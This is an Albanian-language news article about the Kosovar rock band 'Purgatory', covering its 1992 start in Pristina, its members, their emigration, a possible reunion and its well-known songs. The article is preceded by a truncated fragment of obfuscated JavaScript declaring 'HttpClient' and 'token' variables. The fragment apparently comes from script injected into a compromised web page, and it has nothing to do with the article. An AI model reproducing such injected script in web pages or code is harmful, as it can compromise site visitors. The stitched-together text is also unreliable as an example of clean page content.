;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Vera e këtij viti po rikthen këtë rok bend të njohur kosovar në skenë!

By

Dikur njiheshin në gjeneratën e tyre si djemtë e guximshëm që po sillnin ndryshime në rininë shqiptare. Emri i tyre artistik ishte “Purgatory” ndërsa ky grup shpejt u bë i njohur duke krijuar këngët e tyre origjinale dhe duke treguar guxim si me përmbajtjen e teksteve te tyre ashtu edhe me paraqitje.

Sikur edhe shumë rokerë të tjera të asaj gjenerate dhe të viteve të 80-a, edhe grupi Purgatory u bashkua rrugëve të Prishtinës.

Larg luksit dhe kushteve të mira, në vitin  1992 nisen karrierën e tyre grupi, fillimisht i përbërë nga dy anëtarët, Valon Gashi në kitarë dhe Veton Nushi në keyboard, për tu bashkuar më pas edhe me disa artistë të tjerë të grupit si Valton Berisha – Solo Kitarë, Enis Potoku – Vokalist, Haxhi Berisha – Vikalist, Faton Kika – Vokalist, Faton Lahaj – aka: Dashi – Bas, Visar Rexha – Daulle, Berat Fejzullahu – Bass, Driton Ajeti – Daulle, Bekim Krasniqi – Ritëm Kitarë.

Historia e tyre ngeli në kujtesën e kohës pasi të gjithë anëtarët emigruan jashtë Kosovës, ndërsa disa pjesëtarë të grupit nuk i kanë ndalë performancat edhe në diasporë.

Por në kohën e fundit ata janë bashkuar për të kujtuar kohërat e tyre të arta, keshtu edhe shfaqen në disa paraqitjë në rrjetet e tyre sociale.

E kjo afërsi dhe lidhje e fortë qe e kanë ruajtur ndër vite si duke i ka motivuar që të rikthehen edhe një herë në skenë se bashku për të kthyer të publiku nostalgjinë e hiteve të kohës.

Nuk janë bërë të ditur shumë detaje por nga ajo qe kuptohet edhe nga postimet e kitaristit, Valton Berisha diçka është duke u bërë gati dhe vetëm pritet të publikohët.

Ndryshe, Grupi “Purgatory” është një prej rock bendeve kosovare më të pëlqyera të viteve 1990-ta.

Këngët më të njohura të kohës kur ata kanë performuar kanë qenë, ‘Largësia’, ‘Unë dhe ti’, ‘Jakup Ferri’, ‘Do t´i lutem qiellit’, ‘Shqiponjat’, ‘Sadija’, ‘Nëna’, ‘No Place for me in Heaven’, ‘Chaos – Kaosi’ dhe ‘Në stilin tonë’.

Artikuj të ngjashëm